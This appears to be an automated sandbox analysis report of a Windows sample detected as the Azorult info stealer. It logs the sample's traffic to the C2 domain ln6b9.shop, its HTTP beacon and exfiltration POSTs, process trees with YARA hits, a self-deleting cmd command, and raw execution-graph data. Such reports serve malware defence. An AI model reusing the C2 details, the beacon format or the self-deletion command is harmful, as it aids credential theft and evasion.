                                    Aug 29, 2024 12:02:37.287352085 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.287364006 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.287374020 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:37.287379980 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.287389994 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:37.287390947 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.287401915 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.287409067 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:37.287427902 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:37.287452936 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:37.287533045 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.287544012 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.287554979 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.287565947 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.287571907 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.287575960 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:37.287589073 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:37.287615061 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:37.287688017 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.287698984 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.287717104 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.287728071 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:37.287729025 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.287753105 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:37.287780046 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:37.287883043 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.287916899 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.287920952 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:37.287950993 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.287961006 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:37.287983894 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.287992001 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:37.288023949 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:37.288038969 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.288070917 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.288084030 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:37.288105011 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.288111925 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:37.288136959 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.288142920 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:37.288165092 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:37.288183928 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.288218021 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.288225889 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:37.288250923 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.288261890 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:37.288284063 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.288285971 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:37.288316965 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.288322926 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:37.288350105 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.288356066 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:37.288362026 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.288371086 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.288383007 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.288384914 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:37.288394928 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.288405895 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:37.288408995 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.288419008 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:37.288420916 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.288433075 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.288438082 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:37.288444042 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.288455963 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.288455963 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:37.288465977 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.288476944 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.288491011 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:37.288497925 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.288506985 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:37.288510084 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.288526058 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:37.288532019 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.288542986 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.288552046 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:37.288554907 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.288578033 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:37.288597107 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:37.288667917 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.288680077 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.288691044 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.288702965 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.288707972 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:37.288712978 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.288719893 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:37.288724899 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.288742065 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:37.288770914 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:37.288800955 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.288811922 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.288836956 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:37.288861990 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:37.288889885 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.288901091 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.288911104 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.288922071 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.288924932 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:37.288933039 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.288938999 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.288942099 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:37.288944960 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.288983107 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:37.289182901 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.289196014 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.289206982 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.289217949 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.289227962 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.289227962 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:37.289242029 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.289253950 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.289256096 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:37.289263964 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.289275885 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.289282084 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:37.289308071 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:37.289324045 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:37.289345026 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.289357901 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.289369106 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.289380074 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.289382935 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:37.289391994 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.289407969 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:37.289429903 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:37.289459944 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.289498091 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.289499044 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:37.289547920 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:37.289572954 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.289585114 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.289596081 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.289607048 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.289609909 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:37.289618015 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.289628029 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:37.289629936 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.289649010 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:37.289685011 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:37.323980093 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.323997021 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.324016094 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.324028015 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.324043036 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.324055910 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:37.324057102 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:37.324086905 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:37.473799944 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:37.479001999 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:38.492662907 CEST4971880192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:38.497637033 CEST8049718172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:38.497746944 CEST4971880192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:38.497904062 CEST4971880192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:38.497967005 CEST4971880192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:38.502635002 CEST8049718172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:38.502760887 CEST8049718172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:38.502764940 CEST4971880192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:38.502773046 CEST8049718172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:38.502820969 CEST4971880192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:38.502861023 CEST8049718172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:38.502871990 CEST8049718172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:38.502911091 CEST4971880192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:38.502962112 CEST8049718172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:38.503031969 CEST4971880192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:38.503096104 CEST8049718172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:38.503164053 CEST4971880192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:38.503187895 CEST8049718172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:38.503202915 CEST8049718172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:38.503209114 CEST8049718172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:38.503249884 CEST4971880192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:38.507659912 CEST8049718172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:38.507671118 CEST8049718172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:38.507832050 CEST8049718172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:38.507842064 CEST8049718172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:38.507850885 CEST8049718172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:38.507862091 CEST8049718172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:38.525331020 CEST4971880192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:38.530268908 CEST8049718172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:42.497951031 CEST8049718172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:42.498776913 CEST8049718172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:42.498882055 CEST4971880192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:42.499056101 CEST4971880192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:42.503859997 CEST8049718172.67.128.117192.168.2.6
                                    Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                    Aug 29, 2024 12:02:31.695719957 CEST | 50095 | 53 | 192.168.2.6 | 1.1.1.1
                                    Aug 29, 2024 12:02:31.713378906 CEST | 53 | 50095 | 1.1.1.1 | 192.168.2.6
                                    Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                                    Aug 29, 2024 12:02:31.695719957 CEST | 192.168.2.6 | 1.1.1.1 | 0xbb9e | Standard query (0) | ln6b9.shop | A (IP address) | IN (0x0001) | false
                                    Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                                    Aug 29, 2024 12:02:31.713378906 CEST | 1.1.1.1 | 192.168.2.6 | 0xbb9e | No error (0) | ln6b9.shop | | 172.67.128.117 | A (IP address) | IN (0x0001) | false
                                    Aug 29, 2024 12:02:31.713378906 CEST | 1.1.1.1 | 192.168.2.6 | 0xbb9e | No error (0) | ln6b9.shop | | 104.21.2.6 | A (IP address) | IN (0x0001) | false
                                    • ln6b9.shop
                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                    0 | 192.168.2.6 | 49717 | 172.67.128.117 | 80 | 4396 | C:\Windows\SysWOW64\svchost.exe
                                    Timestamp | Bytes transferred | Direction | Data
                                    Aug 29, 2024 12:02:31.797943115 CEST | 272 | OUT | POST /LN341/index.php HTTP/1.1
                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)
                                    Host: ln6b9.shop
                                    Content-Length: 109
                                    Cache-Control: no-cache
                                    Data Raw: 00 00 00 45 14 8b 30 62 ef 26 66 9a 26 66 9a 46 70 9d 35 70 9c 47 70 9d 3a 70 9d 37 70 9d 32 70 9d 37 70 9d 3a 70 9d 33 70 9d 34 14 8b 31 11 8b 30 62 ef 26 66 99 26 66 9a 26 66 9f 26 66 9e 26 66 99 26 66 97 26 67 ea 46 13 8b 30 67 ed 45 17 8b 30 60 8b 30 66 8b 31 11 ef 26 66 96 42 70 9d 35 70 9d 3a 70 9d 32 70 9d 34 70 9d 3b
                                    Data Ascii: E0b&f&fFp5pGp:p7p2p7p:p3p410b&f&f&f&f&f&f&gF0gE0`0f1&fBp5p:p2p4p;
                                    Aug 29, 2024 12:02:33.484227896 CEST | 1236 | IN | HTTP/1.1 200 OK
                                    Date: Thu, 29 Aug 2024 10:02:33 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Transfer-Encoding: chunked
                                    Connection: close
                                    X-Powered-By: PHP/5.6.37
                                    Vary: Accept-Encoding,User-Agent
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ECym2P%2B10O2fmDdONbRkrI4EBumn5DW%2FqxDBQ%2FHj5iY4nVb6RXkPqxnGjWWl%2B%2B%2BrOlLEX458rkV4HLAdvy1Apw0okqFVHFVwV4RztEqrO%2FADtNlpMyfKXJtEBoOo"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 8babb4beeae3425f-EWR
                                    alt-svc: h3=":443"; ma=86400


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                    1 | 192.168.2.6 | 49718 | 172.67.128.117 | 80 | 4396 | C:\Windows\SysWOW64\svchost.exe
                                    Timestamp | Bytes transferred | Direction | Data
                                    Aug 29, 2024 12:02:38.497904062 CEST | 165 | OUT | POST /LN341/index.php HTTP/1.1
                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)
                                    Host: ln6b9.shop
                                    Content-Length: 33917
                                    Cache-Control: no-cache
                                    Aug 29, 2024 12:02:42.497951031 CEST | 625 | IN | HTTP/1.1 200 OK
                                    Date: Thu, 29 Aug 2024 10:02:42 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Transfer-Encoding: chunked
                                    Connection: close
                                    X-Powered-By: PHP/5.6.37
                                    Vary: User-Agent
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zwm8DSp7LM6QMnW%2FR%2BCl5DSTCOloaaKYu%2FLUeCIE0WGPGBTRR2CPCjv9BsMjOxqy6W20eSP26UDYMDbT9xcyC14c3RFK4ywZa2aN4CP6VSwsmehAvA4VrwFlJKh4"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 8babb4e91fd9b9c5-EWR
                                    alt-svc: h3=":443"; ma=86400
                                    Data Raw: 37 0d 0a 66 61 6c 73 65 4f 4b 0d 0a 30 0d 0a 0d 0a
                                    Data Ascii: 7falseOK0


                                    Target ID:0
                                    Start time:06:02:29
                                    Start date:29/08/2024
                                    Path:C:\Users\user\Desktop\Po#70831.exe
                                    Wow64 process (32bit):true
                                    Commandline:"C:\Users\user\Desktop\Po#70831.exe"
                                    Imagebase:0x490000
                                    File size:1'295'872 bytes
                                    MD5 hash:BDE0B7FF5003DA14DF7675564D5A8F6A
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_Azorult, Description: Yara detected Azorult Info Stealer, Source: 00000000.00000002.2377127925.00000000036E0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Azorult_1, Description: Yara detected Azorult, Source: 00000000.00000002.2377127925.00000000036E0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: Windows_Trojan_Azorult_38fce9ea, Description: unknown, Source: 00000000.00000002.2377127925.00000000036E0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                    • Rule: Azorult_1, Description: Azorult Payload, Source: 00000000.00000002.2377127925.00000000036E0000.00000004.00001000.00020000.00000000.sdmp, Author: kevoreilly
                                    • Rule: Azorult, Description: detect Azorult in memory, Source: 00000000.00000002.2377127925.00000000036E0000.00000004.00001000.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                    Reputation:low
                                    Has exited:true

                                    Target ID:2
                                    Start time:06:02:30
                                    Start date:29/08/2024
                                    Path:C:\Windows\SysWOW64\svchost.exe
                                    Wow64 process (32bit):true
                                    Commandline:"C:\Users\user\Desktop\Po#70831.exe"
                                    Imagebase:0xe50000
                                    File size:46'504 bytes
                                    MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_Azorult_1, Description: Yara detected Azorult, Source: 00000002.00000002.2483316959.0000000004DA0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Azorult_1, Description: Yara detected Azorult, Source: 00000002.00000002.2484833657.00000000067AC000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Azorult_1, Description: Yara detected Azorult, Source: 00000002.00000002.2483360582.0000000004DC0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Azorult, Description: Yara detected Azorult Info Stealer, Source: 00000002.00000002.2482219448.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Azorult_1, Description: Yara detected Azorult, Source: 00000002.00000002.2482219448.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                    • Rule: Windows_Trojan_Azorult_38fce9ea, Description: unknown, Source: 00000002.00000002.2482219448.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                    • Rule: Azorult_1, Description: Azorult Payload, Source: 00000002.00000002.2482219448.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: kevoreilly
                                    • Rule: Azorult, Description: detect Azorult in memory, Source: 00000002.00000002.2482219448.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.2484249625.0000000006010000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                    Reputation:high
                                    Has exited:true

                                    Target ID:6
                                    Start time:06:02:42
                                    Start date:29/08/2024
                                    Path:C:\Windows\SysWOW64\cmd.exe
                                    Wow64 process (32bit):true
                                    Commandline:"C:\Windows\system32\cmd.exe" /c C:\Windows\system32\timeout.exe 3 & del "svchost.exe"
                                    Imagebase:0x1c0000
                                    File size:236'544 bytes
                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    Target ID:7
                                    Start time:06:02:42
                                    Start date:29/08/2024
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff66e660000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    Target ID:8
                                    Start time:06:02:42
                                    Start date:29/08/2024
                                    Path:C:\Windows\SysWOW64\timeout.exe
                                    Wow64 process (32bit):true
                                    Commandline:C:\Windows\system32\timeout.exe 3
                                    Imagebase:0xe20000
                                    File size:25'088 bytes
                                    MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                      Execution Graph

                                      Execution Coverage:3.2%
                                      Dynamic/Decrypted Code Coverage:0.9%
                                      Signature Coverage:4.7%
                                      Total number of Nodes:1953
                                      Total number of Limit Nodes:50
95396->95353 95398 49516e 95397->95398 95402 49518f __fread_nolock 95397->95402 95401 4afe0b 22 API calls 95398->95401 95399 4afddb 22 API calls 95400 4935cc 95399->95400 95403 4935f3 95400->95403 95401->95402 95402->95399 95404 493605 95403->95404 95408 493624 __fread_nolock 95403->95408 95407 4afe0b 22 API calls 95404->95407 95405 4afddb 22 API calls 95406 49363b 95405->95406 95406->95362 95407->95408 95408->95405 95409->95359 95486 494e90 LoadLibraryA 95410->95486 95415 4d3ccf 95417 494f39 68 API calls 95415->95417 95416 494ef6 LoadLibraryExW 95494 494e59 LoadLibraryA 95416->95494 95419 4d3cd6 95417->95419 95421 494e59 3 API calls 95419->95421 95423 4d3cde 95421->95423 95516 4950f5 95423->95516 95424 494f20 95424->95423 95425 494f2c 95424->95425 95427 494f39 68 API calls 95425->95427 95429 4944cd 95427->95429 95429->95366 95429->95368 95431 4d3d05 95433 502d15 95432->95433 95434 49511f 64 API calls 95433->95434 95435 502d29 95434->95435 95787 502e66 95435->95787 95438 502d3f 95438->95369 95439 4950f5 40 API calls 95440 502d56 95439->95440 95441 4950f5 40 API calls 95440->95441 95442 502d66 95441->95442 95443 4950f5 40 API calls 95442->95443 95444 502d81 95443->95444 95445 4950f5 40 API calls 95444->95445 95446 502d9c 95445->95446 95447 49511f 64 API calls 95446->95447 95448 502db3 95447->95448 95449 4bea0c ___std_exception_copy 21 API calls 95448->95449 95450 502dba 95449->95450 95451 4bea0c ___std_exception_copy 21 API calls 95450->95451 95452 502dc4 95451->95452 95453 4950f5 40 API calls 95452->95453 95454 502dd8 95453->95454 95455 5028fe 27 API calls 95454->95455 95456 502dee 95455->95456 95456->95438 95793 5022ce 95456->95793 95459 4afe0b 22 API calls 95458->95459 95460 4f96ae __fread_nolock 95459->95460 95460->95391 95462 49a52b 95461->95462 95467 49a4b1 __fread_nolock 95461->95467 95465 4afe0b 22 API calls 95462->95465 95463 4afddb 22 API calls 95464 49a4b8 95463->95464 95466 4afddb 22 API calls 95464->95466 95468 49a4d6 95464->95468 95465->95467 
95466->95468 95467->95463 95468->95391 95470 49400a 95469->95470 95473 4940ae 95469->95473 95472 4afe0b 22 API calls 95470->95472 95474 49403c 95470->95474 95471 4afddb 22 API calls 95471->95474 95472->95474 95473->95391 95474->95471 95474->95473 95475->95380 95477 494f43 95476->95477 95478 494f4a 95476->95478 95479 4be678 67 API calls 95477->95479 95480 494f59 95478->95480 95481 494f6a FreeLibrary 95478->95481 95479->95478 95480->95374 95481->95480 95482->95381 95483->95391 95484->95391 95485->95385 95487 494ea8 GetProcAddress 95486->95487 95488 494ec6 95486->95488 95489 494eb8 95487->95489 95491 4be5eb 95488->95491 95489->95488 95490 494ebf FreeLibrary 95489->95490 95490->95488 95524 4be52a 95491->95524 95493 494eea 95493->95415 95493->95416 95495 494e8d 95494->95495 95496 494e6e GetProcAddress 95494->95496 95499 494f80 95495->95499 95497 494e7e 95496->95497 95497->95495 95498 494e86 FreeLibrary 95497->95498 95498->95495 95500 4afe0b 22 API calls 95499->95500 95501 494f95 95500->95501 95592 495722 95501->95592 95503 494fa1 __fread_nolock 95504 4d3d1d 95503->95504 95505 4950a5 95503->95505 95515 494fdc 95503->95515 95606 50304d 74 API calls 95504->95606 95595 4942a2 CreateStreamOnHGlobal 95505->95595 95508 4d3d22 95510 49511f 64 API calls 95508->95510 95509 4950f5 40 API calls 95509->95515 95511 4d3d45 95510->95511 95512 4950f5 40 API calls 95511->95512 95514 49506e messages 95512->95514 95514->95424 95515->95508 95515->95509 95515->95514 95601 49511f 95515->95601 95517 4d3d70 95516->95517 95518 495107 95516->95518 95628 4be8c4 95518->95628 95521 5028fe 95770 50274e 95521->95770 95523 502919 95523->95431 